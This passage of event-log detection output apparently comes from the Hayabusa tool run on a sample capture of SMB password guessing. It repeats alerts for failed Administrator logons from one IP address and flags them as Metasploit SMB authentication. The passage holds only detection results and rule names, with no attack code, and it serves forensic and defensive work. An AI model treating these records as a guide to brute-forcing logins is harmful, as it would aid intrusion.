Password,User: Administrator : Type: 3 : Workstation: yxhpEP6nnmihvkHB : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:36.796 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:36.833 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: J1HYmJDrWmKjj8DF : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:36.833 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:36.872 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: V81dIfR2SRNDk3a2 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:36.872 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:36.908 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: vaZpLaxB1kcCXqHP : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:36.908 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:36.949 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: JRhs8IoV6R6vyCdL : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:36.949 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:36.988 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 4wUYds3Ym3G2abrV : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:36.988 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:37.016 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: tmBfxm6pPLlSEsUI : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:37.016 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit 
SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:37.056 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: VbAuqFggx0zz5iEn : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:37.056 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:37.104 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 8cytpVOjb4KrNaGg : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:37.104 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:37.149 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: BFFFt7eFzmlzbHhG : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:37.149 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:37.184 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong 
Password,User: Administrator : Type: 3 : Workstation: AJQBZZiNKVGXzx4A : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:37.184 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:37.224 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 7gyu6EyrtbyowTfC : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:37.224 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:37.267 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: aASpkRuPfE8Nl64n : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:37.267 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:37.306 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: MSI2b7LpZpWO3xJW : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:37.306 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:37.344 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: avNkOq3fsGN3yYJi : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:37.344 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:37.384 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Wnlgy6dW33tRk6UX : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:37.384 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:37.416 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: msJ8QrqMluTeUlM9 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:37.416 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit 
SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:37.464 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: H33NuKduMuskxL0D : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:37.464 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:37.500 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 2BHjp69CD1ttbaK2 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:37.500 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:37.544 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 5uxByLPApvfeIhU2 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:37.544 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:37.600 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong 
Password,User: Administrator : Type: 3 : Workstation: 6g0WOAnoGpKyEyzW : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:37.600 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:37.640 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: P8MTs4Nkbm3ryqcp : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:37.640 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:37.688 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 0Nyd7tr3y0BHmPLM : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:37.688 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:37.731 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: J5KiDQOEnDf6xEPN : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:37.731 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:37.768 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 3MBP1buuRcBRiQTG : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:37.768 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:37.804 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: DXXdcg3MSqnGSvax : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:37.804 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:37.841 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Kej7zgIDCNR5tnnp : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:37.841 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit 
SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:37.884 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: gjM8SOeQXwytB6iw : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:37.884 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:37.920 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: XPNATM0IL05vtbZ1 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:37.920 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:37.964 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: H56ci5gbBVzebS2j : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:37.964 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:38.008 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong 
Password,User: Administrator : Type: 3 : Workstation: 6rRofLg1uxrojU7n : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:38.008 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:38.048 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: MAhtwTU8OttAhcxf : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:38.048 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:38.093 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: CwKgAR6OWbkFlxUy : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:38.093 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:38.129 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: lNZR4G0DVsXVg4A9 : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:38.129 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:38.174 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: OZG99tl0RRN3cQoK : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:38.174 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:38.216 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: nwRzAutxa07Y1xE4 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:38.216 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:38.254 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: OwhvrVBSRa8RcCKe : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:38.254 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit 
SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:38.296 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: bLBwBys2favoK7BQ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:38.296 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:38.335 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 3oYpj1rGcsOWNSs7 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:38.335 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:38.380 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: IBogtzE6No62tJB9 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:38.380 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:38.416 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong 
Password,User: Administrator : Type: 3 : Workstation: QQJICDi3T4LiwXZc : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:38.416 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:38.465 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: hnlKkfHYT0ID3BWr : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:38.465 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:38.510 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: gw36XaWrYp2M9CZd : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:38.510 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:38.544 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: j9aT76CAAER0H98I : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:38.544 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:38.580 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: TEOZfrP3IYmutAuq : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:38.580 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:38.628 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: zd54DAwwp0BJhhaZ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:38.628 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:38.665 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: AR6Gc128RlPtwcPl : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:38.665 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit 
